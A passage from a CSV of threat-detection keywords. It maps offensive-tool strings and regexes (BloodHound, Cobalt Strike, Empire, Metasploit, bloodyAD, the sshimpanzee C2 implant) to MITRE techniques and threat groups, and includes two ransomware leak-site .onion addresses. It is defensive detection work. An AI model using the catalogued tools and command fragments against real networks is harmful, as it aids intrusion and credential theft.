Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","36055" 
"*blog.lexfo.fr/sshimpanzee.html*",".{0,1000}blog\.lexfo\.fr\/sshimpanzee\.html.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","36056" "*bloginuser*",".{0,1000}bloginuser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider 
- XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36057" "*blogonpasswords*",".{0,1000}blogonpasswords.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36058" 
"*blogvl7tjyjvsfthobttze52w36wwiz34hrfcmorgvdzb6hikucb7aqd.onion*",".{0,1000}blogvl7tjyjvsfthobttze52w36wwiz34hrfcmorgvdzb6hikucb7aqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36059" "*blogxxu75w63ujqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd.onion*",".{0,1000}blogxxu75w63ujqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36060" "*bloodhound &> /dev/null &*",".{0,1000}bloodhound\s\&\>\s\/dev\/null\s\&.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36061" "*bloodhound --no-sandbox*",".{0,1000}bloodhound\s\-\-no\-sandbox.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","0","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36062" "*BloodHound ZIP File identified, 
extracting*",".{0,1000}BloodHound\sZIP\sFile\sidentified,\sextracting.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","36063" "*BloodHound-*.zip*",".{0,1000}BloodHound\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36064" "*bloodhound.ad.*",".{0,1000}bloodhound\.ad\..{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36065" "*bloodhound.bin*",".{0,1000}bloodhound\.bin.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36066" "*bloodhound.enumeration*",".{0,1000}bloodhound\.enumeration.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36067" "*BloodHound.ps1*",".{0,1000}BloodHound\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SPN.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","36068" "*bloodhound.py *",".{0,1000}bloodhound\.py\s.{0,1000}","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. 
Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","0","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36069" "*bloodhound.py*",".{0,1000}bloodhound\.py.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36070" "*bloodhound.rb*",".{0,1000}bloodhound\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36071" "*bloodhound_output*/dev/null*",".{0,1000}bloodhound_output.{0,1000}\/dev\/null.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","36072" "*bloodhound_output_*.txt*",".{0,1000}bloodhound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","36073" "*bloodhound_output_dconly_*",".{0,1000}bloodhound_output_dconly_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","36074" "*BloodHound3.ps1*",".{0,1000}BloodHound3\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","36075" "*BloodHoundAD*",".{0,1000}BloodHoundAD.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. 
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36076" "*BloodHoundAD*",".{0,1000}BloodHoundAD.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","36077" "*BloodHoundAD/BloodHound*",".{0,1000}BloodHoundAD\/BloodHound.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36078" "*BloodHound-darwin-x64.zip*",".{0,1000}BloodHound\-darwin\-x64\.zip.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","#linux","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36079" "*BloodHoundGraphToGoFetchPath*",".{0,1000}BloodHoundGraphToGoFetchPath.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","Dispossessor","Discovery","https://github.com/GoFetchAD/GoFetch","1","0","N/A","N/A","10","7","633","99","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z","36080" "*bloodhound-import -du neo4j -dp *.json*",".{0,1000}bloodhound\-import\s\-du\sneo4j\s\-dp\s.{0,1000}\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - 
TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36081" "*BloodHound-linux-arm64.zip*",".{0,1000}BloodHound\-linux\-arm64\.zip.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","#linux","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36082" "*BloodHoundLoopResults.zip*",".{0,1000}BloodHoundLoopResults\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","36083" "*BloodHound-master*",".{0,1000}BloodHound\-master.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - 
Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36084" "*BloodHound-modified.ps1*",".{0,1000}BloodHound\-modified\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","36085" "*bloodhound-python*",".{0,1000}bloodhound\-python.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","36086" "*bloodhound-quickwin -u * -p *",".{0,1000}bloodhound\-quickwin\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","36087" "*bloodhound-quickwin-main*",".{0,1000}bloodhound\-quickwin\-main.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","AD Enumeration","6","3","239","26","2025-04-04T05:11:46Z","2021-02-16T16:04:16Z","36088" "*BloodHound-win32-ia32.zip*",".{0,1000}BloodHound\-win32\-ia32\.zip.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36089" "*BloodHound-win32-x64.zip*",".{0,1000}BloodHound\-win32\-x64\.zip.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36090" "*BloodSecurity Hackers Shell*",".{0,1000}BloodSecurity\sHackers\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","36091" "*bloodyAD -*",".{0,1000}bloodyAD\s\-.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","0","N/A","N/A","10","10","1590","145","2025-04-10T10:47:16Z","2021-10-11T15:07:26Z","36092" 
